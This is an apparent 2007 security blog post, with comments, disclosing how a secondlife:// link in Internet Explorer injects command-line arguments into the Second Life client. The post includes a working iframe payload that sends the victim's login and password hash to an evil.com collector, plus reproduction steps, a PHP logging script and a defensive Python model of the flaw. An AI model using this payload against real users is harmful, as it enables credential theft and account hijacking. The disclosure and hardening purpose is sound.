IE pwns SecondLife
First of all, I must say that I am not a bug hunter. I am more on the side of tactical exploitation; you know, figuring out your way through the system. I really hate using exploits and, in fact, I find this approach very dull. There is no fun or value in it whatsoever. Anyway, the big news is that IE (Internet Explorer) pwns SecondLife.

Before going into the details of why and how it happens, I would like to bring your attention to SecondLife for a moment. For those of you who don’t follow cutting-edge technologies, SecondLife is a massive virtual world hosted on a couple of hundred workstations on-line. The cool thing about SecondLife is that you can do all kinds of things: express your artistic side, communicate and, of course, do business. There is a lot of money in SecondLife. Not that long ago, there was this girl who made $1000000 (a million) out of the on-line world. This means that today crooks are after your virtual persona rather than your physical self. Therefore, security in virtual worlds is almost as important as security in the physical world.
Now let’s get back to the real issue. Attackers can steal the victim’s login credentials, and therefore hijack their virtual persona, by simply tricking them into visiting a malicious Web page. Here is an example:
<iframe src='secondlife://" -autologin -loginuri "http://evil.com/sl/record-login.php'></iframe>
Upon visiting the malicious page, the SecondLife client launches and tries to log in automatically (-autologin) against the login server given by -loginuri, in this case the CGI located at http://evil.com/sl/record-login.php. At that moment, the following request is sent to the malicious CGI script. Yes, it is an XML-RPC remote call:
[HTTP_RAW_POST_DATA] => <methodCall>
  <methodName>login_to_simulator</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>first</name>
            <value>
              <string>Elm</string>
            </value>
          </member>
          <member>
            <name>last</name>
            <value>
              <string>Blanco</string>
            </value>
          </member>
          <member>
            <name>passwd</name>
            <value>
              <string>$1$[MD5 Hash of the password here]</string>
            </value>
          </member>
          <member>
            <name>start</name>
            <value>
              <string>last</string>
            </value>
          </member>
          <member>
            <name>version</name>
            <value>
              <string>1.18.2.0</string>
            </value>
          </member>
          <member>
            <name>channel</name>
            <value>
              <string>Second Life Release</string>
            </value>
          </member>
          <member>
            <name>platform</name>
            <value>
              <string>Win</string>
            </value>
          </member>
          …
          …
          …
</methodCall>
Notice the [MD5 Hash of the password here] placeholder. This is where the user’s password goes. The password is MD5 hashed for security reasons. Well, that is definitely a good thing, although completely pointless, since there are plenty of rainbow tables out there which attackers can use to convert the hash back to the plaintext password.
Unfortunately, I cannot put up an on-line proof of concept, because that would expose this server to all sorts of attacks, but you can repeat my steps. Here is how:
- Get Apache with PHP.
- Put the following script into a file called login.php:
  <?php ob_start(); print_r($GLOBALS); error_log(ob_get_contents(), 0); ob_end_clean(); ?>
- Tail -f the PHP error log file. Or, if you don’t know what I am talking about, just skip this step.
- Make a page with the following HTML body:
  <iframe src='secondlife://" -autologin -loginuri "http://localhost/login.php'></iframe>
- Open the page inside Internet Explorer (both IE6 and IE7 are exploitable).
- After the SecondLife client fails to log in, you will get a message in your PHP error log which gives you the credentials plus some other useful info about the victim.
It is that simple. It is automatic and the user doesn’t have to do anything (no user interaction is required). I would rate this issue as Medium risk, although if the victim has a lot of Linden dollars ($L) then the situation becomes quite critical. At the time of writing, 1$ can be exchanged for 268.15$L.
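To make the mechanics behind the iframe above concrete from the defender’s side, here is an added Python model (not Linden Lab’s or Microsoft’s code, nor part of the original post) of what happens when a browser expands a custom protocol handler’s %1 with the raw URI: the double quote in the URI closes the handler’s -url argument and everything after it becomes additional command-line switches. It then shows the two checks that would have stopped this: a strict URI grammar in the handler so no quote or whitespace can reach the command line, and a viewer-side startup policy that refuses -autologin from a handler launch and insists on an https -loginuri. The handler template, the trusted-host set and the evil.example host are assumptions for the demonstration.

```python
import re
from urllib.parse import urlsplit

# Assumed shape of the registered handler command (the real Second Life
# registration string is not on the page). The browser substitutes the raw
# URI for %1 without modification, which is the root of the problem.
HANDLER_TEMPLATE = '"C:\\Program Files\\SecondLife\\SecondLife.exe" -url "%1"'

# Constructed inputs: a normal teleport link and the payload shape from the post.
LEGIT_URI = "secondlife://Ahern/128/128/25"
INJECTED_URI = 'secondlife://" -autologin -loginuri "http://evil.example/sl/record-login.php'

# Strict grammar for what a teleport link may contain: region name, up to
# three small integers, nothing else. Quotes and whitespace are impossible.
SAFE_URI = re.compile(r"^secondlife://[A-Za-z0-9%._~-]+(/\d{1,3}){0,3}$")

# Placeholder allowlist; the real grid login hosts are not on the page.
TRUSTED_LOGIN_HOSTS = {"login.grid.example"}


def build_command_line(uri: str) -> str:
    """Naive handler: drop the URI straight into the template (the bug)."""
    return HANDLER_TEMPLATE.replace("%1", uri)


def safe_build_command_line(uri: str) -> str:
    """Hardened handler: refuse anything outside the URI grammar first."""
    if not SAFE_URI.match(uri):
        raise ValueError("rejected secondlife:// URI: %r" % uri)
    return HANDLER_TEMPLATE.replace("%1", uri)


def handler_accepts(uri: str) -> bool:
    """True if the hardened handler would launch the viewer for this URI."""
    try:
        safe_build_command_line(uri)
        return True
    except ValueError:
        return False


def split_args(cmdline: str) -> list:
    """Double-quote-aware splitter approximating the Windows C runtime rules:
    whitespace separates arguments, double quotes group them. Backslash
    escapes are ignored because none of the inputs here rely on them."""
    args, cur, in_quote, have_token = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
            have_token = True
        elif ch in " \t" and not in_quote:
            if have_token:
                args.append("".join(cur))
                cur, have_token = [], False
        else:
            cur.append(ch)
            have_token = True
    if have_token:
        args.append("".join(cur))
    return args


def argv_to_flags(args: list) -> dict:
    """Map '-flag value' pairs and bare '-flag' switches to a dict."""
    flags, i = {}, 0
    while i < len(args):
        if args[i].startswith("-"):
            if i + 1 < len(args) and not args[i + 1].startswith("-"):
                flags[args[i]] = args[i + 1]
                i += 2
                continue
            flags[args[i]] = None
        i += 1
    return flags


def invocation_problems(argv: list, from_uri_handler: bool) -> list:
    """Viewer-side policy over its own argv: reasons to refuse automatic
    login (an empty list means the invocation is acceptable)."""
    flags = argv_to_flags(argv[1:])
    problems = []
    if not SAFE_URI.match(flags.get("-url") or ""):
        problems.append("malformed -url")
    if from_uri_handler and "-autologin" in flags:
        problems.append("-autologin is not honoured for handler-launched sessions")
    if "-loginuri" in flags:
        parts = urlsplit(flags["-loginuri"] or "")
        if parts.scheme != "https":
            problems.append("-loginuri must use https")
        if parts.hostname not in TRUSTED_LOGIN_HOSTS:
            problems.append("-loginuri host is not a trusted login server")
    return problems


if __name__ == "__main__":
    for uri in (LEGIT_URI, INJECTED_URI):
        argv = split_args(build_command_line(uri))
        print("naive handler argv:", argv)
        print("hardened handler accepts:", handler_accepts(uri))
        print("viewer policy problems:", invocation_problems(argv, True))
```

Running it shows the injected URI turning into six argv entries, including a -loginuri the user never chose, while the same URI is rejected outright by the grammar check and, even if it slipped through, by the viewer policy. The host allowlist is a deliberate policy choice and would break the alternative-grid use mentioned in the comments; the https requirement and the refusal of -autologin from a handler launch are the checks that cost nothing.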
trackbacks
- Vulnerabilidad en IE compromete a SecondLife | LKernelPanic
- Internet Explorer can be used to steal your Second Life Password « JJ Lane’s
- Internet Explorer exploit can be used to hack Second Life accounts at Daikon Forge
- » Internet Explorer Security Risk To Your Second Life - Living in the Metaverse
- Internet Explorer facilita robo de identidad en SecondLife
- King’s Corner » Blog Archive » Another reason not to save your password
- Second Life web resources for September 15th 2007 through September 17th 2007 | VintFalken.com
- Second Life News for September 18, 2007 « The Grid Live
- The Second Life Grid Grind » Blog Archive » The knock out blow? Hack allows user access to passwords.
- Internet Explorer facilita robo de identidad en SecondLife «
- Vulnérabilité de Second Life ? Attention à vos comptes ! « SecondLife Observer France- SLObserver.com
- New risk in the save password feature exposed at My Second Life
- Secondlife Talk » Sicherheitslücke in Second-Life-Client
- Second Life 1.18.2.1 Tecnolives
- Internet Explorer exploit can be used to hack Second Life accounts « Samurai Pickle
comments
pdp, don’t dare to tell “IE is exploitable”!
Don’t forget that, according to Microsoft, the problem here is Second Life trusting too much that funny trickster of the browser ;)
Very cool pdp, IMHO this is a new class of attacks.
Giorgio, really? Is that their official statement? You joker!
Petko, yes (sort of).
Didn’t you see my trackback, http://hackademix.net/2007/09/.....cond-life/ ?
comments are broken PDP.
PDP, actually this is CSRF. ^^
Actually Ronald, it’s not just CSRF. It’s URI exploitation, command argument injection, leading to CSRF and some other shadiness.
Nice work PDP, it’s good to see some others capitalizing on the URI exploitation work Rios and I have been working on. This seems very similar to our sploit against Picasa.
These issues are becoming more amusing each and every day. I think we should start classifying them with a fake acronym like “IEPWNS” as BK and the others finding these issues have been labeling their posts with such titles over at sla.ckers. But yeah this is a pretty cool vulnerability, PDP.
Very nice, it’s a mix of CSRF and a new attack vector, Tactical exploitation that’s the buzzword ;)
I really cannot understand why anybody uses IE. And especially people who are into something more than browsing simple pages from the past century. But, according to the stats of my blog, there are SL rezidents who use IE.
dandellion Kimban, well maybe you are secure for now. With my next post, I will show you that even if you are not using IE, you are still vulnerable to IE’s problems.
pdp, please do.
It’s hard to blame either party completely for this. The real problem is this persistent idea that custom protocol handlers are a good thing. They’re not. Their whole purpose is to give remote, untrusted content command-line-ish access to the handler’s program. That’s a bad idea.
SL can blame IE for not sanitizing. IE can blame SL for respecting -autologin from a custom handler.
I blame them both. SL should never have registered a handler, and browsers should stop permitting them in general.
-Ethan
OUCH! I use Firefox, still, the ’secondlife://’ protocol is Firefox and IE compatible @.@ . And, I got Firefox to “not ask me” X.X .
So, anybody know how to reverse that tiny checkbox? X.X
Found it! Fixed and done *PHEW* :-).
It would seem to me that the blame for this lands solidly on SecondLife. Let’s count the problems:
1) Not sanity checking the results of URL handlers. (Note that MS does explain that it passes the string on to you unmodified, thus they can hardly blame IE for behaving as documented. http://msdn2.microsoft.com/en-.....67914.aspx)
2) Allowing the login information to be sent in the clear. (I notice that HTTP not HTTPS is used here.)
3) Not protecting the credentials. Since, as you note, the hash of the password is as good as the password itself, they gain no (real) benefit by passing it as opposed to raw password.
Clearly, they need to re-work their authentication frame-work.
Actually, IIRC the hash of the password isn’t quite as good as the password itself. The hash is sufficient to log into the Second Life grid and steal the victim’s L$, but it isn’t sufficient to log in to secondlife.com. In particular, I think changing a user’s password or e-mail address can’t be done using just the hash.
Fortunately, there’s a workaround for this vulnerability - disable saved passwords and enter your password by hand each time you login. (Oh, and be wary of secondlife:// links.)
Also, in this case there’s a good reason for the URL handler - it’s used for linking from websites to locations inworld. Not essential, but definitely nice to have.
Oh, and normally the login information is sent over https - it’s just that the command-line option to select where to login accepts non-https URLs. (There are times when it’s useful to be able to login to somewhere else - for example, the OpenSim project.)
Hi, I did some testing :
- On windows, I’ve retrieved the exact same credentials by accessing the page in both IE and FF, making both exploitable.
- On Mac OS however, the URL is taken as a map location, the hack doesn’t occur, it might if you change the URL syntax for the Mac client.
I’ve produced a binary patch for the current windows viewer which disables the -loginuri feature and so should prevent the exploit working.
I’ve attached this patch to the JIRA entry for this bug. If you don’t want to wait for the update from Linden, this should correct the issue:
http://jira.secondlife.com/browse/VWR-2508
pdp, nice one!
It’s nice URI exploitation, CSRF and Information leakage vulnerabilities joint into one attack.
Yes, IE helps to pwn SecondLife ;-). And MS will not take any responsibility for their IE “URI feature” :-), so SL needs to fix it in their software. Like all other vendors whose products are vulnerable to URI exploitation holes.
Nathan and Rios have worked a lot on URI exploitation and command argument injection, and pdp has made his contribution. It is a new attack surface, guys. So every user of SecondLife (and any other software with its own url-handlers) needs to attend to security (especially if they use IE). Waiting for new URI-exploit holes.